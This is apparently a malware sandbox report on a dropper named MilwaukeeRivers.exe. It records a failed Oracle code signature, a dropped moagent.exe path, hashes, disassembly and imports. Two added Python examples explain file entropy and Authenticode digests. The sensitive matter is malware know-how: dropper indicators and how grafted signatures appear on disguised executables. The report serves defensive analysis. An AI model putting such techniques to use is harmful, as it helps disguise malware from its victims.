                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L......O..........................................@.......................................@..................................5...................................E..\...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Biowjk........ ......................@...................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\more.com
                              File Type:data
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.52416308593339
                              Encrypted:false
                              SSDEEP:
                              MD5:1479E46CBD0DED4D9F276EC7A5B7E36E
                              SHA1:D5EF9480C0A587F7D09972812562499833D15699
                              SHA-256:1AEBA6018DD454465C4E15A442541AC650DAEA2FAC14FCDF9E83EA046E968145
                              SHA-512:6609F3529F658EEF102E660F2C11351BD6E4EF5D70B4025FDB54C61C152DB5143493F080E1CC74244F262EBA7EB87F27DB59FBEFCF1BE0D7B4277DFD69737285
                              Malicious:false
                              Reputation:unknown
                              Preview:.....|....ZH....r..F.......<... ................ ....................5.C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.p.b._.D.o.c.k.e.r.\.m.o.a.g.e.n.t...e.x.e.........C.A.L.I.-.P.C.\.c.a.l.i...................0.........q.......+.............................
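The "Entropy (8bit)" and "Encrypted" fields in the dropped-file entries above come from a byte-frequency measure, and the "OpenPGP Public Key" type on two blobs with entropy 7.997 is almost certainly a magic-byte coincidence rather than key material: a type sniffer decides on a few leading bytes, and uniformly random ciphertext hits such patterns a few percent of the time. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample. It computes the same 8-bit Shannon entropy, applies an assumed 7.9 cut-off for "encrypted or compressed" (the sandbox's own rule is not published here), and uses a minimal RFC 4880 packet-tag test to show how little a magic match proves; libmagic's exact rule is version dependent and is not reproduced. The inputs are constructed: a seeded pseudo-random blob of 61440 bytes and a batch-style text, neither of which is the sample's real content.

```python
"""Added example: the 'Entropy (8bit)' / 'Encrypted' columns above, and why a
high-entropy blob can still pick up a type label such as 'OpenPGP Public Key'."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer,
    8.0 for a uniform one. This is what the 'Entropy (8bit)' column reports."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, threshold: float = 7.9) -> str:
    """Triage label in the spirit of the 'Encrypted' column. The 7.9 cut-off
    is this example's assumption, not the sandbox's published rule: ciphertext
    and well-compressed data sit near 7.99, text near 4 to 5, a PE near 6 to 7."""
    if len(data) < 256:
        return "too-small"          # a short buffer cannot approach 8 bits/byte
    return "encrypted-or-compressed" if shannon_entropy(data) >= threshold else "plain"


def openpgp_pubkey_tag_match(first: int) -> bool:
    """Minimal RFC 4880 packet-header test on the first byte: old format
    '10tttt..' or new format '11tttttt' with tag 6 (Public-Key Packet).
    A magic-based sniffer keys on bytes like this; libmagic's exact rule is
    version dependent, but the point holds: a few leading bytes decide the label."""
    if first & 0xC0 == 0x80:        # old-format packet header
        return (first >> 2) & 0x0F == 6
    if first & 0xC0 == 0xC0:        # new-format packet header
        return first & 0x3F == 6
    return False


def false_positive_rate() -> float:
    """Share of the 256 possible first bytes that pass the tag test (5/256),
    i.e. how often a random ciphertext blob would 'be' an OpenPGP public key."""
    return sum(openpgp_pubkey_tag_match(b) for b in range(256)) / 256


def sample_blobs() -> dict:
    """Constructed inputs (not the sample's real dropped files): a seeded
    pseudo-random blob the size of the 61440-byte drop above, and a batch-like
    text of the kind shown in the 24072-byte drop."""
    rnd = random.Random(1547706)
    blob = rnd.randbytes(61440)
    text = b"Set Private=f\r\ncHWorn-Cosmetic-Qualities-\r\n" * 40
    return {
        "blob_entropy": shannon_entropy(blob),
        "blob_label": classify(blob),
        "text_entropy": shannon_entropy(text),
        "text_label": classify(text),
        "blob_first_byte_is_pgp": openpgp_pubkey_tag_match(blob[0]),
    }


if __name__ == "__main__":
    for key, value in sample_blobs().items():
        print(f"{key}: {value}")
    print(f"openpgp tag false-positive rate: {false_positive_rate():.4f}")
```

Run directly, it prints the labels for both constructed inputs. The practical reading for this report: a 7.99-entropy "OpenPGP Public Key" or "data" file written by an installer stub is an encrypted payload stage to be carved and decrypted, not a key to be imported.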
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.980668146883335
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:MilwaukeeRivers.exe
                              File size:971'658 bytes
                              MD5:e922a4d7d2c3c937231aa937b9a2ad25
                              SHA1:b78ade0fbd78bff01d5c86079c9224d7b87f0770
                              SHA256:bdc7b917477bb49af7a5b06e5d9ed20e08fed25944f297a6b36a50d03d8a5777
                              SHA512:501a15eb4c5c64f2df9f454c11951907f33a834885113e14491a6823d8e3373c09523a3eedb52952aada8071dbeec88338dbdeb02a2c4d7a8e0af48eb1dbe5f6
                              SSDEEP:24576:7gk8NlvGOgHdQFQ/Dfw/EQky/vgNs9OHYkc:WvGOgHeFODfwcC3WsSS
                              TLSH:672523901AFD547AD0F94235347198883E79FA1362FBD21BB7087E857E312B64A31B87
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                              Icon Hash:fef0e6e6f8b6d680
                              Entrypoint:0x403883
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                              Signature Valid:false
                              Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                              Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST)
Validity
• Not Before: 07/01/2020 01:00:00, Not After: 11/01/2022 13:00:00
                              Subject Chain
                              • E=pkiadm_us@oracle.com, CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                              Version:3
                              Thumbprint MD5:3FBCE3B31E0004E8BDF9247518E7FF30
                              Thumbprint SHA-1:5C6F6AC9F7DE49E1D88B5F10D74B7C3BB4AD2F7B
                              Thumbprint SHA-256:17BCE26A73BD38D3ABF4E79C66E771C71462C77CCEED92FEEA93760287CE9C15
                              Serial:09105884EB959D3BC8B994F918A7B6EE
                              Instruction
                              sub esp, 000002D4h
                              push ebx
                              push ebp
                              push esi
                              push edi
                              push 00000020h
                              xor ebp, ebp
                              pop esi
                              mov dword ptr [esp+18h], ebp
                              mov dword ptr [esp+10h], 00409268h
                              mov dword ptr [esp+14h], ebp
                              call dword ptr [00408030h]
                              push 00008001h
                              call dword ptr [004080B4h]
                              push ebp
                              call dword ptr [004082C0h]
                              push 00000008h
                              mov dword ptr [00472EB8h], eax
                              call 00007F43590E4E5Bh
                              push ebp
                              push 000002B4h
                              mov dword ptr [00472DD0h], eax
                              lea eax, dword ptr [esp+38h]
                              push eax
                              push ebp
                              push 00409264h
                              call dword ptr [00408184h]
                              push 0040924Ch
                              push 0046ADC0h
                              call 00007F43590E4B3Dh
                              call dword ptr [004080B0h]
                              push eax
                              mov edi, 004C30A0h
                              push edi
                              call 00007F43590E4B2Bh
                              push ebp
                              call dword ptr [00408134h]
                              cmp word ptr [004C30A0h], 0022h
                              mov dword ptr [00472DD8h], eax
                              mov eax, edi
                              jne 00007F43590E242Ah
                              push 00000022h
                              pop esi
                              mov eax, 004C30A2h
                              push esi
                              push eax
                              call 00007F43590E4801h
                              push eax
                              call dword ptr [00408260h]
                              mov esi, eax
                              mov dword ptr [esp+1Ch], esi
                              jmp 00007F43590E24B3h
                              push 00000020h
                              pop ebx
                              cmp ax, bx
                              jne 00007F43590E242Ah
                              add esi, 02h
                              cmp word ptr [esi], bx
                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ C ] VS2010 SP1 build 40219
                              • [RES] VS2010 SP1 build 40219
                              • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0xdb6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xeb84a | 0x1b40 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
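The sample carries a certificate table (Digitally signed: true, a DigiCert-issued chain for Oracle America) that fails verification with "The digital signature of the object did not verify", the TRUST_E_BAD_DIGEST result (error -2146869232 is HRESULT 0x80096010). The IMAGE_DIRECTORY_ENTRY_SECURITY entry in the table above is the one data directory that holds a file offset rather than an RVA, so 0xeb84a is not "in .ndata" (a section with zero raw size holds nothing on disk); it lies in the overlay past the end of the section data (which ends below 0xc000) and close to the end of the 971,658-byte file, the usual position for an appended Authenticode blob. The Python below is an added example, not tooling from the report and not code from the sample: it locates that entry and computes the Authenticode image digest, the value the signature's PKCS#7 SpcIndirectDataContent must carry, and runs it over a constructed minimal PE to show why a certificate table lifted from a legitimately signed binary and appended to a different file is "present" but cannot verify. Assumptions: the common layout with sections contiguous and in file order, the certificate table last and nothing after it; the code does not parse the PKCS#7 itself, so the authoritative verdict still comes from signtool verify /pa /v or PowerShell Get-AuthenticodeSignature.

```python
"""Added example: what 'Digitally signed: true / Signature Valid: false' means
at the byte level, using the IMAGE_DIRECTORY_ENTRY_SECURITY entry above."""
import hashlib
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_SECURITY = 4


def security_directory(pe: bytes):
    """Return (checksum_off, secdir_off, cert_off, cert_size) as FILE offsets.
    The SECURITY entry is the one data directory that holds a raw file offset
    rather than an RVA, so it points into the overlay after the sections;
    mapping it like an RVA is what makes a tool report it 'in' a section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                        # optional header follows the COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        dirs = opt + 96                            # data directories start here for PE32
    elif magic == PE32PLUS_MAGIC:
        dirs = opt + 112                           # ... and here for PE32+
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    checksum_off = opt + 64                        # CheckSum sits at +64 in both formats
    secdir_off = dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir_off)
    if cert_size and cert_off + cert_size > len(pe):
        raise ValueError("certificate table runs past end of file")
    return checksum_off, secdir_off, cert_off, cert_size


def authenticode_digest(pe: bytes, algo: str = "sha256") -> str:
    """Image digest as Authenticode computes it: every byte of the file except
    the CheckSum field, the SECURITY directory entry and the certificate table.
    Assumes the common layout (sections contiguous and in file order, certificate
    table last); a signature verifies only if the digest inside its PKCS#7
    SpcIndirectDataContent equals this value."""
    checksum_off, secdir_off, cert_off, cert_size = security_directory(pe)
    skip = [(checksum_off, checksum_off + 4), (secdir_off, secdir_off + 8)]
    if cert_size:
        skip.append((cert_off, cert_off + cert_size))
    h, pos = hashlib.new(algo), 0
    for start, end in sorted(skip):
        h.update(pe[pos:start])
        pos = end
    h.update(pe[pos:])
    return h.hexdigest()


def build_test_pe(payload: bytes, cert: bytes) -> bytes:
    """Constructed minimal PE32 (not the analysed sample): headers padded to
    0x200, one section whose raw data is `payload`, then `cert` appended as
    the certificate table and referenced from the SECURITY directory entry."""
    size_of_headers = 0x200
    cert_off = size_of_headers + len(payload)
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 60, size_of_headers)
    struct.pack_into("<I", opt, 64, 0xDEADBEEF)                       # CheckSum
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_off, len(cert))
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x1000,
                       len(payload), size_of_headers, 0, 0, 0, 0, 0x60000020)
    header = (dos + b"PE\0\0" + coff + bytes(opt) + sect).ljust(size_of_headers, b"\0")
    return header + payload + cert


def grafted_signature_demo() -> dict:
    """Why a certificate table lifted from a legitimately signed binary cannot
    verify on another file: swapping the certificate bytes leaves the image
    digest unchanged, but any change to the rest of the file alters it, so the
    digest the lifted signature vouches for belongs to the original binary."""
    wincert = struct.pack("<IHH", 16, 0x0200, 0x0002)                # WIN_CERTIFICATE header
    payload = bytes(range(256)) * 8                                  # constructed section data
    base = build_test_pe(payload, wincert + b"A" * 8)
    swapped = build_test_pe(payload, wincert + b"B" * 8)
    tampered = build_test_pe(bytes([payload[0] ^ 0xFF]) + payload[1:], wincert + b"A" * 8)
    rechecksummed = bytearray(base)
    struct.pack_into("<I", rechecksummed, security_directory(base)[0], 0)
    d = authenticode_digest(base)
    return {
        "cert_swap_keeps_digest": d == authenticode_digest(swapped),
        "checksum_change_keeps_digest": d == authenticode_digest(bytes(rechecksummed)),
        "payload_change_breaks_digest": d != authenticode_digest(tampered),
    }


if __name__ == "__main__":
    print(grafted_signature_demo())
```

Pointed at a real file, `security_directory` tells you whether the certificate table sits in the overlay as expected and whether it is truncated, and `authenticode_digest` gives the value to compare against the messageDigest carried in the PKCS#7; a mismatch is exactly the bad-digest failure the report records, and the DigiCert chain and Oracle subject then say nothing about who produced this file.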
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0xdb6 | 0xe00 | 89ee89fe7851f158d99c5bfbf671994b | False | 0.5638950892857143 | data | 5.283772998839277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf5000 | 0xf32 | 0x1000 | 28eb16c084f743398eac7a551641079b | False | 0.570556640625 | data | 5.240238381990466 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf41d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7952127659574468
RT_DIALOG | 0xf4640 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xf4740 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xf485c | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xf48bc | 0x14 | data | English | United States | 1.1
RT_VERSION | 0xf48d0 | 0x210 | data | English | United States | 0.509469696969697
RT_MANIFEST | 0xf4ae0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States